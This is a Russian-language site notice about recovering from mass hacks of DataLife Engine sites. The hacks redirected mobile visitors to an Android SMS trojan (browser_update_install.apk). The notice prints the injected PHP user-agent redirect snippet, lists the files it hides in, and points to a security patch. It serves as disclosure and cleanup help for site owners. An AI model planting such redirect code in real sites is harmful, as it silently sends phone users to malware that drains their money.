Наш сайт восстановлен после взлома!

Наш сайт восстановлен после взлома!

После нового года, в период с 8 по 18 января, в сети прошли массовые взломы сайтов управляемые DLE движком,
с целью внедрения кода запускающего загрузку трояна (browser_update_install.apk) на устройства оснащенные OS Android!!!

После нового года, в период с 8 по 18 января, в сети прошли массовые взломы сайтов управляемые DLE движком, с целью внедрения кода запускающего загрузку трояна:

browser_update_install.apk

на устройства оснащенные OS Android!!!

При открытии сайта на ПК ничего не происходит, но при заходе с телефона, подгружается (browser_update_install.apk) — троянец, который впоследствии будет слать с вашего телефона СМС на короткие платные номера, высасывая деньги с счета телефона.

Владельцам сайтов под управлением DataLife Engine:

Вот внедренный код:

PHP-код$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");if ($iphone || $android || $palmpre || $ipod || $berry === true) {     header('Location: http://domain/');}

Этот код может быть внедрен в файлы:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Решение: удалить код, применить патч http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Уважаемые посетители нашего сайта, от лица администрации, просим пощения за доставленные неудобства!
Администрация сайта очень сожалеет об этом инцеденте!

PS:
В случае если Вы не пользовались антивирусами на ваших устройствах и случайно установили вредоносную программу на свой телефон, незамедлительно установите данную утелиту на ваш Android: Dr.Web Light
Затем проведите полную проверку вашего устройства.
В том случае, если с телефона были отправлены смс и с вас были сняты деньги обратитесь к вашему сотовому оператору для возвращения потраченной суммы!

Поделиться записью:

Добавить комментарий